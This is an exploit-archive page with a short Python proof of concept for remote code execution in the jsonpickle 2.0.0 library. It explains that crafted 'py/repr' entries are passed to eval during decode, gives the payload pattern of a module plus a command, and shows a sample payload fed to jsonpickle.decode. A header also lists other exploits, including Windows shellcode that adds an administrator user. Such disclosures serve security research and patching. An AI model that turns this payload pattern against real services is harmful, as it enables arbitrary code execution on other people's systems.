338282491b
8 changes to exploits/shellcodes SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path python jsonpickle 2.0.0 - Remote Code Execution Unified Remote 3.9.0.2463 - Remote Code Execution LayerBB 1.1.4 - 'search_query' SQL Injection Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
27 lines
No EOL
1.2 KiB
Python
Executable file
27 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: python jsonpickle 2.0.0 - Remote Code Execution
|
|
# Date: 24-2-2021
|
|
# Vendor Homepage: https://jsonpickle.github.io
|
|
# Exploit Author: Adi Malyanker, Shay Reuven
|
|
# Software Link: https://github.com/jsonpickle/jsonpickle
|
|
# Version: 2.0.0
|
|
# Tested on: windows, linux
|
|
|
|
# Python is an open source language. jsonickle module is provided to convert objects into a serialized form,
|
|
# and later recover the data back into an object. the decode is used to undeserialize serialized strings.
|
|
|
|
# If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls.
|
|
# the problem is in the inner function loadrepr function which eval each serialized string which contains "py/repr".
|
|
|
|
# The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet
|
|
|
|
# the payload was found during our research made on deserialization functions.
|
|
|
|
# the pattern should be :
|
|
# {..{"py/repr":<the module to import>/<the command to be executed.>}..}
|
|
|
|
# example:
|
|
|
|
malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
|
|
|
|
# the command on the server side
|
|
some_parameter = jsonpickle.decode(malicious) |